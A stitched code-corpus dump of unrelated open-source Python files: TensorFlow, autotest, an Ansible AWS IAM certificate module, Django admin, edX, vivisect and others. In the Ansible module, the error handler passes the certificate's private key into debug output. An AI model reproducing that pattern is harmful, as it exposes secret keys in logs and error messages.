# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for fused Cudnn RNN models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnGRU
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnLSTM
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnRNNRelu
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnRNNTanh
from tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import RNNParamsSaveable
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| apache-2.0 |
joyxu/autotest | setup.py | 2 | 4417 | import os
try:
import autotest.common as common
except ImportError:
import common
# High level way of installing each autotest component
import client.setup
import frontend.setup
import cli.setup
import server.setup
import scheduler.setup
import database_legacy.setup
import tko.setup
import utils.setup
import mirror.setup
import installation_support.setup
# pylint: disable=E0611
from distutils.core import setup
from sphinx.setup_command import BuildDoc
cmdclass = {'build_doc': BuildDoc}
from autotest.client.shared import version
def _combine_dicts(list_dicts):
result_dict = {}
for d in list_dicts:
for k in d:
result_dict[k] = d[k]
return result_dict
def _fix_data_paths(package_data_dict):
'''
    Corrects package data paths.
    When the package name is compound and the package contents (that is,
    file paths) begin with the same directory name found in the package
    name, setuptools assumes there's an extra directory level. This checks
    for that condition and strips the first directory name when it matches.
'''
result = {}
for package_name, package_content in package_data_dict.items():
package_structure = package_name.split('.')
package_structure_1st_level = package_structure[1]
result[package_name] = []
for p in package_content:
path_structure = p.split(os.path.sep)
path_structure_1st_level = path_structure[0]
if package_structure_1st_level == path_structure_1st_level:
path = os.path.join(*path_structure[1:])
else:
path = p
result[package_name].append(path)
return result
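# For illustration (hypothetical layout): given
#   {'autotest.client': ['client/tools/*', 'README']}
# _fix_data_paths() strips the matching 'client/' prefix and returns
#   {'autotest.client': ['tools/*', 'README']}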
def get_package_dir():
return _combine_dicts([client.setup.get_package_dir(),
frontend.setup.get_package_dir(),
cli.setup.get_package_dir(),
server.setup.get_package_dir(),
scheduler.setup.get_package_dir(),
database_legacy.setup.get_package_dir(),
tko.setup.get_package_dir(),
utils.setup.get_package_dir(),
mirror.setup.get_package_dir()])
def get_packages():
return (client.setup.get_packages() +
frontend.setup.get_packages() +
cli.setup.get_packages() +
server.setup.get_packages() +
scheduler.setup.get_packages() +
database_legacy.setup.get_packages() +
tko.setup.get_packages() +
utils.setup.get_packages() +
mirror.setup.get_packages() +
installation_support.setup.get_packages())
def get_data_files():
return (client.setup.get_data_files() +
tko.setup.get_data_files() +
utils.setup.get_data_files() +
mirror.setup.get_data_files())
def get_package_data():
return _combine_dicts([
_fix_data_paths(client.setup.get_package_data()),
_fix_data_paths(frontend.setup.get_package_data()),
_fix_data_paths(cli.setup.get_package_data()),
_fix_data_paths(server.setup.get_package_data()),
_fix_data_paths(scheduler.setup.get_package_data()),
_fix_data_paths(database_legacy.setup.get_package_data()),
_fix_data_paths(utils.setup.get_package_data())
])
def get_scripts():
return (client.setup.get_scripts() +
frontend.setup.get_scripts() +
cli.setup.get_scripts() +
server.setup.get_scripts() +
scheduler.setup.get_scripts() +
database_legacy.setup.get_scripts() +
tko.setup.get_scripts() +
installation_support.setup.get_scripts())
def run():
setup(name='autotest',
description='Autotest test framework',
maintainer='Lucas Meneghel Rodrigues',
maintainer_email='lmr@redhat.com',
version=version.get_version(),
url='http://autotest.github.com',
package_dir=get_package_dir(),
package_data=get_package_data(),
packages=get_packages(),
scripts=get_scripts(),
data_files=get_data_files(),
cmdclass=cmdclass,
command_options={'build_doc': {'source_dir':
('setup.py', 'documentation/source')}}
)
if __name__ == '__main__':
run()
| gpl-2.0 |
brokenjacobs/ansible | lib/ansible/modules/cloud/amazon/iam_cert.py | 5 | 12176 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: iam_cert
short_description: Manage server certificates for use on ELBs and CloudFront
description:
- Allows for the management of server certificates
version_added: "2.0"
options:
name:
description:
- Name of certificate to add, update or remove.
required: true
new_name:
description:
- When present, this will update the name of the cert with the value passed here.
required: false
new_path:
description:
- When present, this will update the path of the cert with the value passed here.
required: false
state:
description:
- Whether to create, delete certificate. When present is specified it will attempt to make an update if new_path or new_name is specified.
required: true
default: null
choices: [ "present", "absent" ]
path:
description:
- When creating or updating, specify the desired path of the certificate
required: false
default: "/"
cert_chain:
description:
- The CA certificate chain in PEM encoded format.
- Note that prior to 2.4, this parameter expected a path to a file. Since 2.4 this is now accomplished using a lookup plugin. See examples for detail
required: false
default: null
cert:
description:
- The certificate body in PEM encoded format.
- Note that prior to 2.4, this parameter expected a path to a file. Since 2.4 this is now accomplished using a lookup plugin. See examples for detail
required: false
key:
description:
- The key of the certificate in PEM encoded format.
- Note that prior to 2.4, this parameter expected a path to a file. Since 2.4 this is now accomplished using a lookup plugin. See examples for detail
dup_ok:
description:
- By default the module will not upload a certificate that is already uploaded into AWS. If set to True, it will upload the certificate as
long as the name is unique.
required: false
default: False
requirements: [ "boto" ]
author: Jonathan I. Davila
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Basic server certificate upload from local file
- iam_cert:
name: very_ssl
state: present
cert: "{{ lookup('file', 'path/to/cert') }}"
key: "{{ lookup('file', 'path/to/key') }}"
cert_chain: "{{ lookup('file', 'path/to/certchain') }}"
# Server certificate upload using key string
- iam_cert:
name: very_ssl
state: present
path: "/a/cert/path/"
cert: body_of_somecert
key: vault_body_of_privcertkey
cert_chain: body_of_myverytrustedchain
'''
import json
import sys
try:
import boto
import boto.iam
import boto.ec2
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def boto_exception(err):
'''generic error message handler'''
if hasattr(err, 'error_message'):
error = err.error_message
elif hasattr(err, 'message'):
error = err.message
else:
error = '%s: %s' % (Exception, err)
return error
def cert_meta(iam, name):
    # fetch the certificate once instead of issuing five separate API calls
    certificate = iam.get_server_certificate(name).\
        get_server_certificate_result.\
        server_certificate
    metadata = certificate.server_certificate_metadata
    opath = metadata.path
    ocert = certificate.certificate_body
    ocert_id = metadata.server_certificate_id
    upload_date = metadata.upload_date
    exp = metadata.expiration
    return opath, ocert, ocert_id, upload_date, exp
def dup_check(module, iam, name, new_name, cert, orig_cert_names, orig_cert_bodies, dup_ok):
update=False
if any(ct in orig_cert_names for ct in [name, new_name]):
for i_name in [name, new_name]:
if i_name is None:
continue
if cert is not None:
try:
c_index=orig_cert_names.index(i_name)
            except ValueError:
                # list.index() raises ValueError when i_name is absent
                continue
else:
# NOTE: remove the carriage return to strictly compare the cert bodies.
slug_cert = cert.replace('\r', '')
slug_orig_cert_bodies = orig_cert_bodies[c_index].replace('\r', '')
if slug_orig_cert_bodies == slug_cert:
update=True
break
elif slug_orig_cert_bodies != slug_cert:
module.fail_json(changed=False, msg='A cert with the name %s already exists and'
' has a different certificate body associated'
' with it. Certificates cannot have the same name' % i_name)
else:
update=True
break
elif cert in orig_cert_bodies and not dup_ok:
for crt_name, crt_body in zip(orig_cert_names, orig_cert_bodies):
if crt_body == cert:
module.fail_json(changed=False, msg='This certificate already'
' exists under the name %s' % crt_name)
return update
def cert_action(module, iam, name, cpath, new_name, new_path, state,
cert, key, chain, orig_cert_names, orig_cert_bodies, dup_ok):
if state == 'present':
update = dup_check(module, iam, name, new_name, cert, orig_cert_names,
orig_cert_bodies, dup_ok)
if update:
opath, ocert, ocert_id, upload_date, exp = cert_meta(iam, name)
changed=True
if new_name and new_path:
iam.update_server_cert(name, new_cert_name=new_name, new_path=new_path)
module.exit_json(changed=changed, original_name=name, new_name=new_name,
original_path=opath, new_path=new_path, cert_body=ocert,
upload_date=upload_date, expiration_date=exp)
elif new_name and not new_path:
iam.update_server_cert(name, new_cert_name=new_name)
module.exit_json(changed=changed, original_name=name, new_name=new_name,
cert_path=opath, cert_body=ocert,
upload_date=upload_date, expiration_date=exp)
elif not new_name and new_path:
iam.update_server_cert(name, new_path=new_path)
module.exit_json(changed=changed, name=new_name,
original_path=opath, new_path=new_path, cert_body=ocert,
upload_date=upload_date, expiration_date=exp)
else:
changed=False
module.exit_json(changed=changed, name=name, cert_path=opath, cert_body=ocert,
upload_date=upload_date, expiration_date=exp,
msg='No new path or name specified. No changes made')
else:
changed=True
iam.upload_server_cert(name, cert, key, cert_chain=chain, path=cpath)
opath, ocert, ocert_id, upload_date, exp = cert_meta(iam, name)
module.exit_json(changed=changed, name=name, cert_path=opath, cert_body=ocert,
upload_date=upload_date, expiration_date=exp)
elif state == 'absent':
if name in orig_cert_names:
changed=True
iam.delete_server_cert(name)
module.exit_json(changed=changed, deleted_cert=name)
else:
changed=False
module.exit_json(changed=changed, msg='Certificate with the name %s already absent' % name)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(
default=None, required=True, choices=['present', 'absent']),
name=dict(default=None, required=False),
cert=dict(default=None, required=False),
key=dict(default=None, required=False, no_log=True),
cert_chain=dict(default=None, required=False),
new_name=dict(default=None, required=False),
path=dict(default='/', required=False),
new_path=dict(default=None, required=False),
dup_ok=dict(default=False, required=False, type='bool')
)
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=[],
)
if not HAS_BOTO:
module.fail_json(msg="Boto is required for this module")
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
try:
if region:
iam = connect_to_aws(boto.iam, region, **aws_connect_kwargs)
else:
iam = boto.iam.connection.IAMConnection(**aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg=str(e))
state = module.params.get('state')
name = module.params.get('name')
path = module.params.get('path')
new_name = module.params.get('new_name')
new_path = module.params.get('new_path')
cert_chain = module.params.get('cert_chain')
dup_ok = module.params.get('dup_ok')
    # default cert and key to None so cert_action() never sees an
    # undefined name when the parameters are omitted
    cert = key = None
    if state == 'present':
        if module.params.get('cert') is not None:
            cert = module.params.get('cert')
        if module.params.get('key') is not None:
            key = module.params.get('key')
        if module.params.get('cert_chain') is not None:
            cert_chain = module.params.get('cert_chain')
orig_certs = [ctb['server_certificate_name'] for ctb in \
iam.get_all_server_certs().\
list_server_certificates_result.\
server_certificate_metadata_list]
orig_bodies = [iam.get_server_certificate(thing).\
get_server_certificate_result.\
certificate_body \
for thing in orig_certs]
if new_name == name:
new_name = None
if new_path == path:
new_path = None
changed = False
try:
cert_action(module, iam, name, path, new_name, new_path, state,
cert, key, cert_chain, orig_certs, orig_bodies, dup_ok)
except boto.exception.BotoServerError as err:
module.fail_json(changed=changed, msg=str(err), debug=[cert,key])
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 |
g19-hs/personfinder | tests/test_send_mail.py | 16 | 2145 | #!/usr/bin/python2.7
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for send_mail.py."""
from google.appengine.api import mail
from google.appengine.api import mail_errors
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
import logging
import model
import mox
import os
import send_mail
import test_handler
import unittest
import webob
class SendMailTests(unittest.TestCase):
'''Test the send_mail error handling.'''
def test_email_fail(self):
subject = 'test'
to = 'bad_email_address'
sender = 'me@example.com'
body = 'stuff'
mymox = mox.Mox()
mymox.StubOutWithMock(logging, 'error')
logging.error('EmailSender (to: %s, subject: %s), '
'failed with exception %s' % (to, subject, 'exception'))
mymox.StubOutWithMock(mail, 'send_mail')
mail.send_mail(sender=sender,
subject=subject,
to=to,
body=body).AndRaise(mail_errors.Error('exception'))
handler = send_mail.EmailSender()
repo = 'haiti'
model.Repo(key_name=repo).put()
request = webapp.Request(
webob.Request.blank(
'/admin/send_mail?to=%s&subject=%s&sender=%s' %
(to, subject, sender)).environ)
request.method = 'POST'
request.body = 'body=%s' % body
handler.initialize(request, webapp.Response())
mymox.ReplayAll()
handler.post()
# shouldn't raise an error.
assert True
mymox.VerifyAll()
| apache-2.0 |
bunnyitvn/webptn | build/lib.linux-i686-2.7/django/contrib/admin/views/main.py | 85 | 16606 | import operator
from functools import reduce
from django.core.exceptions import SuspiciousOperation, ImproperlyConfigured
from django.core.paginator import InvalidPage
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models.fields import FieldDoesNotExist
from django.utils.datastructures import SortedDict
from django.utils.encoding import force_str, force_text
from django.utils.translation import ugettext, ugettext_lazy
from django.utils.http import urlencode
from django.contrib.admin import FieldListFilter
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.util import (quote, get_fields_from_path,
lookup_needs_distinct, prepare_lookup_value)
# Changelist settings
ALL_VAR = 'all'
ORDER_VAR = 'o'
ORDER_TYPE_VAR = 'ot'
PAGE_VAR = 'p'
SEARCH_VAR = 'q'
TO_FIELD_VAR = 't'
IS_POPUP_VAR = 'pop'
ERROR_FLAG = 'e'
IGNORED_PARAMS = (
ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, IS_POPUP_VAR, TO_FIELD_VAR)
# Text to display within change-list table cells if the value is blank.
EMPTY_CHANGELIST_VALUE = ugettext_lazy('(None)')
class ChangeList(object):
def __init__(self, request, model, list_display, list_display_links,
list_filter, date_hierarchy, search_fields, list_select_related,
list_per_page, list_max_show_all, list_editable, model_admin):
self.model = model
self.opts = model._meta
self.lookup_opts = self.opts
self.root_query_set = model_admin.queryset(request)
self.list_display = list_display
self.list_display_links = list_display_links
self.list_filter = list_filter
self.date_hierarchy = date_hierarchy
self.search_fields = search_fields
self.list_select_related = list_select_related
self.list_per_page = list_per_page
self.list_max_show_all = list_max_show_all
self.model_admin = model_admin
# Get search parameters from the query string.
try:
self.page_num = int(request.GET.get(PAGE_VAR, 0))
except ValueError:
self.page_num = 0
self.show_all = ALL_VAR in request.GET
self.is_popup = IS_POPUP_VAR in request.GET
self.to_field = request.GET.get(TO_FIELD_VAR)
self.params = dict(request.GET.items())
if PAGE_VAR in self.params:
del self.params[PAGE_VAR]
if ERROR_FLAG in self.params:
del self.params[ERROR_FLAG]
if self.is_popup:
self.list_editable = ()
else:
self.list_editable = list_editable
self.query = request.GET.get(SEARCH_VAR, '')
self.query_set = self.get_query_set(request)
self.get_results(request)
if self.is_popup:
title = ugettext('Select %s')
else:
title = ugettext('Select %s to change')
self.title = title % force_text(self.opts.verbose_name)
self.pk_attname = self.lookup_opts.pk.attname
def get_filters(self, request):
lookup_params = self.params.copy() # a dictionary of the query string
use_distinct = False
# Remove all the parameters that are globally and systematically
# ignored.
for ignored in IGNORED_PARAMS:
if ignored in lookup_params:
del lookup_params[ignored]
# Normalize the types of keys
for key, value in lookup_params.items():
if not isinstance(key, str):
# 'key' will be used as a keyword argument later, so Python
# requires it to be a string.
del lookup_params[key]
lookup_params[force_str(key)] = value
if not self.model_admin.lookup_allowed(key, value):
raise SuspiciousOperation("Filtering by %s not allowed" % key)
filter_specs = []
if self.list_filter:
for list_filter in self.list_filter:
if callable(list_filter):
# This is simply a custom list filter class.
spec = list_filter(request, lookup_params,
self.model, self.model_admin)
else:
field_path = None
if isinstance(list_filter, (tuple, list)):
# This is a custom FieldListFilter class for a given field.
field, field_list_filter_class = list_filter
else:
# This is simply a field name, so use the default
# FieldListFilter class that has been registered for
# the type of the given field.
field, field_list_filter_class = list_filter, FieldListFilter.create
if not isinstance(field, models.Field):
field_path = field
field = get_fields_from_path(self.model, field_path)[-1]
spec = field_list_filter_class(field, request, lookup_params,
self.model, self.model_admin, field_path=field_path)
# Check if we need to use distinct()
use_distinct = (use_distinct or
lookup_needs_distinct(self.lookup_opts,
field_path))
if spec and spec.has_output():
filter_specs.append(spec)
# At this point, all the parameters used by the various ListFilters
# have been removed from lookup_params, which now only contains other
# parameters passed via the query string. We now loop through the
# remaining parameters both to ensure that all the parameters are valid
# fields and to determine if at least one of them needs distinct(). If
# the lookup parameters aren't real fields, then bail out.
try:
for key, value in lookup_params.items():
lookup_params[key] = prepare_lookup_value(key, value)
use_distinct = (use_distinct or
lookup_needs_distinct(self.lookup_opts, key))
return filter_specs, bool(filter_specs), lookup_params, use_distinct
except FieldDoesNotExist as e:
raise IncorrectLookupParameters(e)
def get_query_string(self, new_params=None, remove=None):
if new_params is None: new_params = {}
if remove is None: remove = []
p = self.params.copy()
for r in remove:
for k in list(p):
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return '?%s' % urlencode(sorted(p.items()))
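    # For example (illustrative values): with self.params == {'o': '2', 'q': 'x'},
    # get_query_string({'p': 1}, remove=['q']) returns '?o=2&p=1'.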
def get_results(self, request):
paginator = self.model_admin.get_paginator(request, self.query_set, self.list_per_page)
# Get the number of objects, with admin filters applied.
result_count = paginator.count
# Get the total number of objects, with no admin filters applied.
        # Perform a slight optimization: Check to see whether any filters were
        # given. If not, reuse paginator.count for the total, since that value
        # has already been computed and cached above.
if not self.query_set.query.where:
full_result_count = result_count
else:
full_result_count = self.root_query_set.count()
can_show_all = result_count <= self.list_max_show_all
multi_page = result_count > self.list_per_page
# Get the list of objects to display on this page.
if (self.show_all and can_show_all) or not multi_page:
result_list = self.query_set._clone()
else:
try:
result_list = paginator.page(self.page_num+1).object_list
except InvalidPage:
raise IncorrectLookupParameters
self.result_count = result_count
self.full_result_count = full_result_count
self.result_list = result_list
self.can_show_all = can_show_all
self.multi_page = multi_page
self.paginator = paginator
def _get_default_ordering(self):
ordering = []
if self.model_admin.ordering:
ordering = self.model_admin.ordering
elif self.lookup_opts.ordering:
ordering = self.lookup_opts.ordering
return ordering
def get_ordering_field(self, field_name):
"""
Returns the proper model field name corresponding to the given
field_name to use for ordering. field_name may either be the name of a
proper model field or the name of a method (on the admin or model) or a
callable with the 'admin_order_field' attribute. Returns None if no
proper model field name can be matched.
"""
try:
field = self.lookup_opts.get_field(field_name)
return field.name
except models.FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
if callable(field_name):
attr = field_name
elif hasattr(self.model_admin, field_name):
attr = getattr(self.model_admin, field_name)
else:
attr = getattr(self.model, field_name)
return getattr(attr, 'admin_order_field', None)
def get_ordering(self, request, queryset):
"""
Returns the list of ordering fields for the change list.
First we check the get_ordering() method in model admin, then we check
the object's default ordering. Then, any manually-specified ordering
from the query string overrides anything. Finally, a deterministic
order is guaranteed by ensuring the primary key is used as the last
ordering field.
"""
params = self.params
ordering = list(self.model_admin.get_ordering(request)
or self._get_default_ordering())
if ORDER_VAR in params:
# Clear ordering and used params
ordering = []
order_params = params[ORDER_VAR].split('.')
for p in order_params:
try:
none, pfx, idx = p.rpartition('-')
field_name = self.list_display[int(idx)]
order_field = self.get_ordering_field(field_name)
if not order_field:
continue # No 'admin_order_field', skip it
ordering.append(pfx + order_field)
except (IndexError, ValueError):
continue # Invalid ordering specified, skip it.
# Add the given query's ordering fields, if any.
ordering.extend(queryset.query.order_by)
# Ensure that the primary key is systematically present in the list of
# ordering fields so we can guarantee a deterministic order across all
# database backends.
pk_name = self.lookup_opts.pk.name
if not (set(ordering) & set(['pk', '-pk', pk_name, '-' + pk_name])):
# The two sets do not intersect, meaning the pk isn't present. So
# we add it.
ordering.append('-pk')
return ordering
def get_ordering_field_columns(self):
"""
Returns a SortedDict of ordering field column numbers and asc/desc
"""
# We must cope with more than one column having the same underlying sort
# field, so we base things on column numbers.
ordering = self._get_default_ordering()
ordering_fields = SortedDict()
if ORDER_VAR not in self.params:
# for ordering specified on ModelAdmin or model Meta, we don't know
# the right column numbers absolutely, because there might be more
# than one column associated with that ordering, so we guess.
for field in ordering:
if field.startswith('-'):
field = field[1:]
order_type = 'desc'
else:
order_type = 'asc'
for index, attr in enumerate(self.list_display):
if self.get_ordering_field(attr) == field:
ordering_fields[index] = order_type
break
else:
for p in self.params[ORDER_VAR].split('.'):
none, pfx, idx = p.rpartition('-')
try:
idx = int(idx)
except ValueError:
continue # skip it
ordering_fields[idx] = 'desc' if pfx == '-' else 'asc'
return ordering_fields
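    # For example (illustrative): with self.params[ORDER_VAR] == '0.-2', this
    # yields SortedDict([(0, 'asc'), (2, 'desc')]): column 0 ascending,
    # column 2 descending.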
def get_query_set(self, request):
# First, we collect all the declared list filters.
(self.filter_specs, self.has_filters, remaining_lookup_params,
use_distinct) = self.get_filters(request)
# Then, we let every list filter modify the queryset to its liking.
qs = self.root_query_set
for filter_spec in self.filter_specs:
new_qs = filter_spec.queryset(request, qs)
if new_qs is not None:
qs = new_qs
try:
# Finally, we apply the remaining lookup parameters from the query
# string (i.e. those that haven't already been processed by the
# filters).
qs = qs.filter(**remaining_lookup_params)
except (SuspiciousOperation, ImproperlyConfigured):
# Allow certain types of errors to be re-raised as-is so that the
# caller can treat them in a special way.
raise
except Exception as e:
# Every other error is caught with a naked except, because we don't
# have any other way of validating lookup parameters. They might be
# invalid if the keyword arguments are incorrect, or if the values
# are not in the correct type, so we might get FieldError,
# ValueError, ValidationError, or ?.
raise IncorrectLookupParameters(e)
# Use select_related() if one of the list_display options is a field
# with a relationship and the provided queryset doesn't already have
# select_related defined.
if not qs.query.select_related:
if self.list_select_related:
qs = qs.select_related()
else:
for field_name in self.list_display:
try:
field = self.lookup_opts.get_field(field_name)
except models.FieldDoesNotExist:
pass
else:
if isinstance(field.rel, models.ManyToOneRel):
qs = qs.select_related()
break
# Set ordering.
ordering = self.get_ordering(request, qs)
qs = qs.order_by(*ordering)
# Apply keyword searches.
def construct_search(field_name):
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
elif field_name.startswith('@'):
return "%s__search" % field_name[1:]
else:
return "%s__icontains" % field_name
if self.search_fields and self.query:
orm_lookups = [construct_search(str(search_field))
for search_field in self.search_fields]
for bit in self.query.split():
or_queries = [models.Q(**{orm_lookup: bit})
for orm_lookup in orm_lookups]
qs = qs.filter(reduce(operator.or_, or_queries))
if not use_distinct:
for search_spec in orm_lookups:
if lookup_needs_distinct(self.lookup_opts, search_spec):
use_distinct = True
break
if use_distinct:
return qs.distinct()
else:
return qs
def url_for_result(self, result):
pk = getattr(result, self.pk_attname)
return reverse('admin:%s_%s_change' % (self.opts.app_label,
self.opts.module_name),
args=(quote(pk),),
current_app=self.model_admin.admin_site.name)
| bsd-3-clause |
Statistica/676-candidates | candidates_by_party_greater_100k.py | 1 | 1686 | # -*- coding: utf-8 -*-
# Written by Jonathan Saewitz, released May 24th, 2016 for Statisti.ca
# Released under the MIT License (https://opensource.org/licenses/MIT)
import csv, plotly.plotly as plotly, plotly.graph_objs as go, requests
from collections import Counter
from bs4 import BeautifulSoup
#the following candidates raised $100,000 or more (from https://github.com/Statistica/676-candidates/blob/master/amount_raised_by_candidate.py):
candidates=["QUARTEY, MARY AKU",
"LAWSON, EDGAR A",
"GILMORE, JAMES S III",
"STEIN, JILL",
"JOHNSON, GARY",
"CHAFEE, LINCOLN DAVENPORT MR.",
"EVERSON, MARK",
"PATAKI, GEORGE E",
"WEBB, JAMES",
"WILSON, WILLIE",
"PERRY, JAMES R (RICK)",
"JINDAL, BOBBY",
"SANTORUM, RICHARD J.",
"HUCKABEE, MIKE",
"WILLIAMS, ELAINE WHIGHAM",
"GRAHAM, LINDSEY O",
"O'MALLEY, MARTIN JOSEPH",
"DE LA FUENTE, ROQUE ROCKY",
"WALKER, SCOTT",
"CHRISTIE, CHRISTOPHER J",
"FIORINA, CARLY",
"PAUL, RAND",
"KASICH, JOHN R",
"BUSH, JEB",
"RUBIO, MARCO",
"TRUMP, DONALD J",
"CARSON, BENJAMIN S SR MD",
"CRUZ, RAFAEL EDWARD \"TED\"",
"SANDERS, BERNARD",
"CLINTON, HILLARY RODHAM"
]
c=Counter()
with open('presidential_candidates.csv', 'r') as f:
reader=csv.reader(f)
    reader.next()  # skip the headers row
    for row in reader:  # loop through the candidates
        if row[14] in candidates:  # row[14] is the candidate's name
            # checks if the current candidate we're looping through is one of the candidates listed above
party=row[12]
c[party]+=1
fig = {
'data': [{
'labels': c.keys(),
'values': c.values(),
'type': 'pie'
}],
'layout': {'title': '2016 US Presidential Candidates\' Party Affiliation (only candidates who raised ≥$100,000)'}
}
plotly.plot(fig)
| mit |
teltek/edx-platform | lms/djangoapps/certificates/management/commands/ungenerated_certs.py | 16 | 6600 | """
Management command to find all students that need certificates for
courses that have finished, and put their cert requests on the queue.
"""
from __future__ import print_function
import datetime
import logging
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from opaque_keys.edx.keys import CourseKey
from pytz import UTC
from six import text_type
from lms.djangoapps.certificates.api import generate_user_certificates
from lms.djangoapps.certificates.models import CertificateStatuses, certificate_status_for_student
from xmodule.modulestore.django import modulestore
LOGGER = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Management command to find all students that need certificates
for courses that have finished and put their cert requests on the queue.
"""
help = """
Find all students that need certificates for courses that have finished and
put their cert requests on the queue.
If --user is given, only grade and certify the requested username.
Use the --noop option to test without actually putting certificates on the
queue to be generated.
"""
def add_arguments(self, parser):
parser.add_argument(
'-n', '--noop',
action='store_true',
dest='noop',
help="Don't add certificate requests to the queue"
)
parser.add_argument(
'--insecure',
action='store_true',
dest='insecure',
help="Don't use https for the callback url to the LMS, useful in http test environments"
)
parser.add_argument(
'-c', '--course',
metavar='COURSE_ID',
dest='course',
required=True,
help='Grade and generate certificates for a specific course'
)
parser.add_argument(
'-f', '--force-gen',
metavar='STATUS',
dest='force',
default=False,
help='Will generate new certificates for only those users whose entry in the certificate table matches '
'STATUS. STATUS can be generating, unavailable, deleted, error or notpassing.'
)
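    # Example invocation (the course id is illustrative; run through the LMS
    # manage.py wrapper of an edx-platform checkout):
    #   ./manage.py lms ungenerated_certs -c course-v1:edX+DemoX+Demo_Course --noop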
def handle(self, *args, **options):
LOGGER.info(
(
u"Starting to create tasks for ungenerated certificates "
u"with arguments %s and options %s"
),
text_type(args),
text_type(options)
)
        # Will only generate a certificate if the current
        # status is in the unavailable state; this can be
        # overridden with the --force-gen flag
if options['force']:
valid_statuses = [getattr(CertificateStatuses, options['force'])]
else:
valid_statuses = [CertificateStatuses.unavailable]
# Print update after this many students
status_interval = 500
course = CourseKey.from_string(options['course'])
ended_courses = [course]
for course_key in ended_courses:
# prefetch all chapters/sequentials by saying depth=2
course = modulestore().get_course(course_key, depth=2)
enrolled_students = User.objects.filter(
courseenrollment__course_id=course_key
)
total = enrolled_students.count()
count = 0
start = datetime.datetime.now(UTC)
for student in enrolled_students:
count += 1
if count % status_interval == 0:
# Print a status update with an approximation of
# how much time is left based on how long the last
# interval took
diff = datetime.datetime.now(UTC) - start
timeleft = diff * (total - count) / status_interval
hours, remainder = divmod(timeleft.seconds, 3600)
minutes, _seconds = divmod(remainder, 60)
print("{0}/{1} completed ~{2:02}:{3:02}m remaining".format(count, total, hours, minutes))
start = datetime.datetime.now(UTC)
cert_status = certificate_status_for_student(student, course_key)['status']
LOGGER.info(
(
u"Student %s has certificate status '%s' "
u"in course '%s'"
),
student.id,
cert_status,
text_type(course_key)
)
if cert_status in valid_statuses:
if not options['noop']:
# Add the certificate request to the queue
ret = generate_user_certificates(
student,
course_key,
course=course,
insecure=options['insecure']
)
if ret == 'generating':
LOGGER.info(
(
u"Added a certificate generation task to the XQueue "
u"for student %s in course '%s'. "
u"The new certificate status is '%s'."
),
student.id,
text_type(course_key),
ret
)
else:
LOGGER.info(
(
u"Skipping certificate generation for "
u"student %s in course '%s' "
u"because the noop flag is set."
),
student.id,
text_type(course_key)
)
else:
LOGGER.info(
(
u"Skipped student %s because "
u"certificate status '%s' is not in %s"
),
student.id,
cert_status,
text_type(valid_statuses)
)
LOGGER.info(
(
u"Completed ungenerated certificates command "
u"for course '%s'"
),
text_type(course_key)
)
| agpl-3.0 |
bat-serjo/vivisect | vivisect/qt/main.py | 1 | 19470 | import os
import sys
import vstruct.qt as vs_qt
import envi.expression as e_expr
import envi.qt.config as e_q_config
import vqt.main as vq_main
import vqt.colors as vq_colors
import vqt.qpython as vq_python
import vqt.application as vq_app
import vivisect.cli as viv_cli
import vivisect.base as viv_base
import vivisect.vdbext as viv_vdbext
import vivisect.qt.tips as viv_q_tips
import vivisect.qt.views as viv_q_views
import vivisect.qt.memory as viv_q_memory
import vivisect.qt.remote as viv_q_remote
import vivisect.qt.ustruct as viv_q_ustruct
import vivisect.extensions as viv_extensions
import vivisect.qt.funcgraph as viv_q_funcgraph
import vivisect.qt.funcviews as viv_q_funcviews
import vivisect.qt.symboliks as viv_q_symboliks
import vivisect.remote.share as viv_share
from PyQt5 import QtCore
from PyQt5.QtWidgets import QInputDialog
from vqt.common import *
from vivisect.const import *
from vqt.main import getOpenFileName, getSaveFileName
from vqt.saveable import compat_isNone
dock_top = QtCore.Qt.TopDockWidgetArea
